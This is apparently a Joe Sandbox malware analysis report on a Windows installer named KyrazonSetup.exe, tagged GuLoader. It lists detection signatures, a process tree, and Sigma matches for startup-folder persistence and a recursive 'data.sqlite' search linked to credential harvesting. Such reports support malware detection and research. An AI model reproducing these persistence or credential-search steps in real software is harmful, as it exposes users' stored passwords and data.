Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KyrazonSetup.exe

Overview

General Information

Sample name:KyrazonSetup.exe
Analysis ID:1489101
MD5:7a84bbeade50e7110fe8d278dc22b92d
SHA1:9624dde2043059402cc1f729684ecc2f9a424eef
SHA256:c765f61cee33c326acc4ea19256267c35129a1ec7edb567fe0b5ed9a88e3d6b1
Tags:exeGuLoader
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Drops large PE files
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal communication platform credentials (via file / registry access)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries keyboard layouts
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Too many similar processes found
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Process Tree

  • System is w10x64
  • KyrazonSetup.exe (PID: 6556 cmdline: "C:\Users\user\Desktop\KyrazonSetup.exe" MD5: 7A84BBEADE50E7110FE8D278DC22B92D)
    • cmd.exe (PID: 6616 cmdline: "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv | "C:\Windows\system32\find.exe" "KyrazonGodot.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5768 cmdline: tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq KyrazonGodot.exe" /FO csv MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • find.exe (PID: 6168 cmdline: "C:\Windows\system32\find.exe" "KyrazonGodot.exe" MD5: 15B158BC998EEF74CFDD27C44978AEA0)
  • KyrazonGodot.exe (PID: 4504 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • KyrazonGodot.exe (PID: 6464 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1748 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • Shortcut.exe (PID: 5644 cmdline: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe /A:C "/F:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk" /T:C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe MD5: 59375510BDE2FF0DBA7A8197AD9F12BB)
      • conhost.exe (PID: 5572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3636 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7140 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 2484 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2664 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2912 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 5644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5768 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7004 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6592 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • where.exe (PID: 4296 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
    • KyrazonGodot.exe (PID: 7296 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2364 --field-trial-handle=1752,i,6861512032431707821,4936876543960781282,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 7364 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7412 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7500 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7528 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7604 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7652 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7740 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7792 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7820 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7868 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7904 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7948 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 7948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3152 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 1640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 3636 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 7172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1184 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5644 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7660 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7656 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7604 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7964 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • Conhost.exe (PID: 5676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1168 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8188 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 2252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2148 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 8160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 8172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2328 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • KyrazonGodot.exe (PID: 7896 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • KyrazonGodot.exe (PID: 8104 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1640 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 8120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8176 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • KyrazonGodot.exe (PID: 4296 cmdline: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\KyrazonGodot" --mojo-platform-channel-handle=2304 --field-trial-handle=1644,i,8481596452906072929,5216124186602772652,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: EEB12AAC1FF31A9D17BA437700CAF9D6)
    • cmd.exe (PID: 6576 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7480 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • Conhost.exe (PID: 7436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7384 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7460 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7428 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7576 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7416 cmdline: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • where.exe (PID: 7580 cmdline: where /r . data.sqlite MD5: 3CF958B0F63FB1D74F7FCFE14B039A58)
    • cmd.exe (PID: 7780 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7876 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 7852 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7948 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • cmd.exe (PID: 6560 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 8156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 8164 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
    • Conhost.exe (PID: 7556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 5768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 2800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 3804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 5856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 5288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 6636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 6664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Conhost.exe (PID: 7456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Conhost.exe (PID: 3120 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, ParentProcessId: 4504, ParentProcessName: KyrazonGodot.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", ProcessId: 6592, ProcessName: cmd.exe
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe" , ParentImage: C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, ParentProcessId: 4504, ParentProcessName: KyrazonGodot.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "where /r . data.sqlite", ProcessId: 6592, ProcessName: cmd.exe
Sigma detected: Startup Folder File Write
Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\Shortcut.exe, ProcessId: 5644, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results
Source: KyrazonSetup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: C:\Users\user\Desktop\KyrazonSetup.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\b3cf5a4f-183c-5906-ad23-5f1f95ad8d0eJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\LICENSE.electron.txtJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile created: C:\Users\user\AppData\Local\Programs\KyrazonGodot\resources\app.asar.unpacked\node_modules\windows-shortcuts\lib\shortcut\ReadMe.txtJump to behavior
Source: KyrazonSetup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D3DCompiler_47.pdb source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\libEGL.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1861082432.000000000078C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1808616840.0000000004FA8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D3DCompiler_47.pdbGCTL source: KyrazonSetup.exe, 00000000.00000003.1806828851.0000000004FA5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1864822801.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\projects\src\out\Default\vulkan-1.dll.pdb source: KyrazonSetup.exe, 00000000.00000003.1803630374.0000000005600000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803339063.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, KyrazonSetup.exe, 00000000.00000003.1803837379.000000000564F000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
Source: C:\Users\user\Desktop\KyrazonSetup.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resourcesJump to behavior
Source: C:\Users\user\Desktop\KyrazonSetup.exeFile opened: C:\Users\user\AppData\Local\Temp\nsjC3E6.tmp\7z-out\resources\app.asar.unpacked\node_modules\windows-shortcuts\libJump to behavior
